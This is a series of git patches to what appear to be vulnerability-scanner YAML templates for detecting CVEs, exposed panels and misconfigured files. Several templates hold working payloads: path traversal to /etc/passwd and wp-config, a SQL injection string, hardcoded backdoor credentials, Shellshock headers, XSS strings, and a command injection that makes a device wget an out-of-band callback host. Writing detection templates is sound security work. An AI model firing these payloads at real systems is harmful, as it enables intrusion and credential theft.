- type: word words: - - "" + - "" part: body - type: word From 1754aecb5e34916a1f64a9bb78e27ccde777af18 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 17:54:19 +0530 Subject: [PATCH 1008/4083] Update wamp-server-configuration.yaml --- misconfiguration/wamp-server-configuration.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/wamp-server-configuration.yaml b/misconfiguration/wamp-server-configuration.yaml index 43b8b708f1..7594ecf0de 100644 --- a/misconfiguration/wamp-server-configuration.yaml +++ b/misconfiguration/wamp-server-configuration.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp + tags: wamp,exposure requests: - method: GET From a0581944aa89c519ab156bfc847c10557184a60d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 19:32:43 +0700 Subject: [PATCH 1009/4083] Update CVE-2018-20985.yaml --- cves/2018/CVE-2018-20985.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 1088abcea7..f4865b0ee7 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -15,15 +15,15 @@ requests: path: - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../etc/passwd" + body: "x_login=../../../../wp-config" matchers-condition: and matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - + - type: word + words: + - DB_NAME + - WPENGINE_ACCOUNT + part: body - type: status status: - 200 From 07ee00e38d1de3e7cc5ee33ad9d518d3b6411dfb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 19:34:36 +0700 Subject: [PATCH 1010/4083] Update CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 7c3165b3f0..2dd82e5904 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -1,7 +1,7 @@ id: CVE-2016-1000152 info: - name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) + name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: Reflected XSS in wordpress plugin tidio-form v1.0 From a4ec6a2b1117f157e404ab89fb801007286729c0 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 21:46:18 +0900 Subject: [PATCH 1011/4083] Create kevinlab-bems-sqli.yaml The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-bems-sqli.yaml diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml new file mode 100644 index 0000000000..8d345dfd23 --- /dev/null +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -0,0 +1,28 @@ +id: kevinlab-bems-sqli + +info: + name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection + author: gy741 + severity: high + description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + tags: kevinlab,sqli + +requests: + - raw: + - | + POST /http/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + + matchers: + - type: word + words: + - "XPATH syntax error" From 4e0f08bfc8efbc9eda2098ef58cc45c2e8591b7e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 18:32:54 +0530 Subject: [PATCH 1012/4083] Update dotclear-detect.yaml --- technologies/dotclear-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/dotclear-detect.yaml b/technologies/dotclear-detect.yaml index 9defe59aed..7d622ff72a 100644 --- a/technologies/dotclear-detect.yaml +++ b/technologies/dotclear-detect.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/dc2/admin/auth.php" + - "{{BaseURL}}/auth.php" matchers-condition: and matchers: From 2b1818b1c44adb59f6c2f8ab5ab69b22ad882d3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 18:40:28 +0530 Subject: [PATCH 1013/4083] Update sceditor-detect.yaml --- technologies/sceditor-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/sceditor-detect.yaml b/technologies/sceditor-detect.yaml index e867919421..1ce4bcf978 100644 --- a/technologies/sceditor-detect.yaml +++ b/technologies/sceditor-detect.yaml @@ -17,6 +17,7 @@ requests: words: - "Ticket BBCode editor - SCEditor" - 'title="SCEditor"' + condition: and - type: status status: - 200 From ae827beadec0717230280107e88230991ae011f2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 18:42:11 +0530 Subject: [PATCH 1014/4083] Update CVE-2016-1000154.yaml --- cves/2016/CVE-2016-1000154.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index 7be2a14754..c459fd33e9 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -4,19 +4,20 @@ info: name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin whizz v1.0. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 69db0862ee688475299805dfeb7fe1907a5b8a7a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 22 Jul 2021 22:13:00 +0900 Subject: [PATCH 1015/4083] Create kevinlab-bems-backdoor.yaml The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Signed-off-by: GwanYeong Kim --- .../other/kevinlab-bems-backdoor.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/kevinlab-bems-backdoor.yaml diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml new file mode 100644 index 0000000000..8256687c57 --- /dev/null +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -0,0 +1,36 @@ +id: kevinlab-bems-backdoor + +info: + name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account + author: gy741 + severity: critical + description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab + +requests: + - raw: + - | + POST /http/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip, deflate + Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 + Connection: close + + requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D + + matchers-condition: and + matchers: + - type: regex + regex: + - 'data":"[A-Za-z0-9-]+' + - 'login_key":"[A-Za-z0-9-]+' + part: body + condition: or + + - type: status + status: + - 200 From 4db131a5d3d3c6ca0d0b5f475f3b65de2c96cea3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Jul 2021 19:01:00 +0530 Subject: [PATCH 1016/4083] Update CVE-2018-20985.yaml --- cves/2018/CVE-2018-20985.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index f4865b0ee7..2bbc81587c 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -15,14 +15,16 @@ requests: path: - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" - body: "x_login=../../../../wp-config" + body: "x_login=../../../wp-config" matchers-condition: and matchers: - type: word words: - - DB_NAME - - WPENGINE_ACCOUNT + - "The base configuration for WordPress" + - "define( 'DB_NAME'," + - "define( 'DB_PASSWORD'," + condition: and part: body - type: status status: From 115af3000de997be9db0d619cc7e6bf780679a0f Mon Sep 17 00:00:00 2001 From: Nicolas Mattiocco Date: Thu, 22 Jul 2021 15:48:17 +0200 Subject: [PATCH 1017/4083] Create mantis-detect.yaml --- exposed-panels/mantis-detect.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/mantis-detect.yaml diff --git a/exposed-panels/mantis-detect.yaml b/exposed-panels/mantis-detect.yaml new file mode 100644 index 0000000000..2c5d6524e4 --- /dev/null +++ b/exposed-panels/mantis-detect.yaml @@ -0,0 +1,18 @@ +id: mantis-detect + +info: + name: Mantis portal detection + author: makyotox + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login_page.php" + matchers: + - type: word + words: + - "MantisBT" + condition: and + part: body From 5b0b7a67818c5d1ad019b6f43c7deaa4e82361c3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 22 Jul 2021 23:10:43 +0530 Subject: [PATCH 1018/4083] Update exposures/logs/roundcube-log-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/logs/roundcube-log-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/roundcube-log-disclosure.yaml b/exposures/logs/roundcube-log-disclosure.yaml index 63d017a187..33c1b9bb29 100644 --- a/exposures/logs/roundcube-log-disclosure.yaml +++ b/exposures/logs/roundcube-log-disclosure.yaml @@ -18,6 +18,7 @@ requests: words: - "IMAP Error:" part: body + - type: status status: - 200 From 19f81758d2ceac7a5c21dbb3cdb38d0c1e88ff29 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 23 Jul 2021 06:11:05 +0700 Subject: [PATCH 1019/4083] Create CVE-2011-3315.yaml --- cves/2011/CVE-2011-3315.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2011/CVE-2011-3315.yaml diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml new file mode 100644 index 0000000000..4a2998e643 --- /dev/null +++ b/cves/2011/CVE-2011-3315.yaml @@ -0,0 +1,24 @@ +id: CVE-2011-3315 + +info: + name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/36256 + tags: cve,cve2011,lfi,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 62ad2f3089855cf31d0d1a11724d0e554aa05362 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 23 Jul 2021 06:12:07 +0700 Subject: [PATCH 1020/4083] Create CVE-2013-5528.yaml --- cves/2013/CVE-2013-5528.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2013/CVE-2013-5528.yaml diff --git a/cves/2013/CVE-2013-5528.yaml b/cves/2013/CVE-2013-5528.yaml new file mode 100644 index 0000000000..004272bf5c --- /dev/null +++ b/cves/2013/CVE-2013-5528.yaml @@ -0,0 +1,25 @@ +id: CVE-2013-5528 + +info: + name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + reference: https://www.exploit-db.com/exploits/40887 + tags: cve,cve2013,lfi,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From abacdafb4fad93f489071e4aafad3e9205494f3a Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 22 Jul 2021 19:44:57 -0400 Subject: [PATCH 1021/4083] Update coldfusion-debug-xss.yaml The term adobe is more general than coldfusion. Since Coldfusion is a product of Adobe. --- vulnerabilities/other/coldfusion-debug-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 300d94a436..240be6a9cd 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: medium reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml - tags: adobe,xss + tags: adobe,coldfusion,xss requests: - method: GET From 2c77510faa64c3ace80b4c610b2a2d92c456ac57 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 23 Jul 2021 08:47:29 +0900 Subject: [PATCH 1022/4083] Create visual-tools-dvr-rce.yaml vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- .../other/visual-tools-dvr-rce.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/visual-tools-dvr-rce.yaml diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml new file mode 100644 index 0000000000..39f9c70291 --- /dev/null +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -0,0 +1,28 @@ +id: visual-tools-dvr-rce + +info: + name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://www.exploit-db.com/exploits/50098 + tags: visualtools,rce,oob + +requests: + - raw: + - | + GET /cgi-bin/slogin/login.py HTTP/1.1 + Host: {{Hostname}} + Accept: */* + User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 7298a0b35d8b82b29eaf771f7b6fdd5e2ece16fd Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 23 Jul 2021 11:14:31 +0900 Subject: [PATCH 1023/4083] Create CVE-2020-13117.yaml Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-13117.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-13117.yaml diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml new file mode 100644 index 0000000000..8d293cf617 --- /dev/null +++ b/cves/2020/CVE-2020-13117.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-13117 + +info: + name: Wavlink Multiple AP - Unauthenticated RCE + author: gy741 + severity: critical + description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. + tags: cve,cve2020,wavlink,rce,oob + reference: + - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Origin: http://{{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Connection: close + + newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + From 27fdbb0c48fcd0603ebc25999f7d3a3fcf4164d4 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 22 Jul 2021 22:36:02 -0400 Subject: [PATCH 1024/4083] Update adobe-component-login.yaml Many instances have the main path written in lowercase. Test: https://www.cogicarc.com http://gilbertorodrigues.adv.br/cfide/componentutils/login.cfm https://www.doarelprofessional.com.br http://www.motioninfo.net http://jeronesadvocacia.adv.br --- exposed-panels/adobe-component-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/adobe-component-login.yaml b/exposed-panels/adobe-component-login.yaml index cf0a6e2a19..99bde2adb4 100644 --- a/exposed-panels/adobe-component-login.yaml +++ b/exposed-panels/adobe-component-login.yaml @@ -11,7 +11,8 @@ requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' + matchers-condition: and matchers: - type: word From 70fd663219240eb4033126f0647ce237ae37a9e8 Mon Sep 17 00:00:00 2001 From: Naveen J Date: Fri, 23 Jul 2021 08:40:33 +0530 Subject: [PATCH 1025/4083] Update CVE-2014-6271.yaml --- cves/2014/CVE-2014-6271.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 19cbb5c440..fbb8332f62 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -17,6 +17,7 @@ requests: - "{{BaseURL}}/cgi-bin/status/status.cgi" - "{{BaseURL}}/test.cgi" - "{{BaseURL}}/debug.cgi" + - "{{BaseURL}}/cgi-bin/test-cgi" headers: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " From 838002d77aa7045692915cc602f9f9cfa9b7292d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:44:23 +0530 Subject: [PATCH 1026/4083] Update exposures/configs/appsec-yml-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/appsec-yml-disclosure.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index 291d27d117..f8f1386fa5 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -23,7 +23,10 @@ requests: - "source:" part: body condition: and - + - type: word + part: header + words: + - application/yaml - type: status status: - 200 From 39f23522e4a1e0380362a6f534f3ab6631bcab38 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:44:38 +0530 Subject: [PATCH 1027/4083] Update exposures/configs/dockerfile-hidden-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/dockerfile-hidden-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml index 4592139362..c471ef1211 100644 --- a/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/.dockerfile" - "{{BaseURL}}/.Dockerfile" + matchers-condition: and matchers: - type: regex From 9271fa9492f176e774bff220e44c98b5761aeff7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:44:47 +0530 Subject: [PATCH 1028/4083] Update exposures/configs/dockerfile-hidden-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/dockerfile-hidden-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml index c471ef1211..194043946a 100644 --- a/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -19,6 +19,7 @@ requests: regex: - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+' part: body + - type: status status: - 200 From ea45cdd369facae661af3381d3bf260be63a1cff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:44:54 +0530 Subject: [PATCH 1029/4083] Update exposures/configs/git-credentials-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/git-credentials-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/git-credentials-disclosure.yaml b/exposures/configs/git-credentials-disclosure.yaml index 7db331dfa9..b0bf844872 100644 --- a/exposures/configs/git-credentials-disclosure.yaml +++ b/exposures/configs/git-credentials-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/.git-credentials" + matchers-condition: and matchers: - type: regex From dd025100e704a4a28d75e9ba6cce68931c45327e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:45:30 +0530 Subject: [PATCH 1030/4083] Update exposures/configs/github-workflows-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/github-workflows-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index 35a0311ed4..9fbd439407 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Github Workflow Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json tags: exposure,config requests: From 1646db115686cf7319062aff2054440b9451d817 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:45:37 +0530 Subject: [PATCH 1031/4083] Update exposures/configs/hp-ilo-serial-key-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/hp-ilo-serial-key-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/exposures/configs/hp-ilo-serial-key-disclosure.yaml index 8ae8ec05f2..b77b8a2249 100644 --- a/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -23,6 +23,7 @@ requests: words: - "Content-Type: text/html" part: header + - type: status status: - 200 From 4051f03440b91c42b51c7c62e924368967c88064 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:45:44 +0530 Subject: [PATCH 1032/4083] Update exposures/configs/kubernetes-kustomization-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/kubernetes-kustomization-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index 6a40cf7714..7f5bfb48e5 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/kustomization.yml" + matchers-condition: and matchers: - type: regex From a96c9c74c689baa5af15ecc6999d575edd073f36 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:45:52 +0530 Subject: [PATCH 1033/4083] Update exposures/configs/kubernetes-kustomization-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/kubernetes-kustomization-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index 7f5bfb48e5..6f11c57d51 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -22,6 +22,7 @@ requests: - "(?m)^\\sresources\\s*:" - "(?m)^\\snamespace\\s*:" part: body + - type: word words: - "Content-Type: application/yaml" From 80b12053794ceb6a414f74be93685977aeca3221 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:45:58 +0530 Subject: [PATCH 1034/4083] Update exposures/configs/kubernetes-kustomization-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/configs/kubernetes-kustomization-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index 6f11c57d51..f128f9c240 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -27,6 +27,7 @@ requests: words: - "Content-Type: application/yaml" part: header + - type: status status: - 200 From c4a1a12fe860e05066a2c9c3b6176e6a8bacb3b8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Jul 2021 09:46:06 +0530 Subject: [PATCH 1035/4083] Update exposures/files/php-user-ini-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/php-user-ini-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/php-user-ini-disclosure.yaml b/exposures/files/php-user-ini-disclosure.yaml index d2982cbc34..882a285d4a 100644 --- a/exposures/files/php-user-ini-disclosure.yaml +++ b/exposures/files/php-user-ini-disclosure.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}/user.ini" - "{{BaseURL}}/.user.ini" + matchers-condition: and matchers: - type: word From 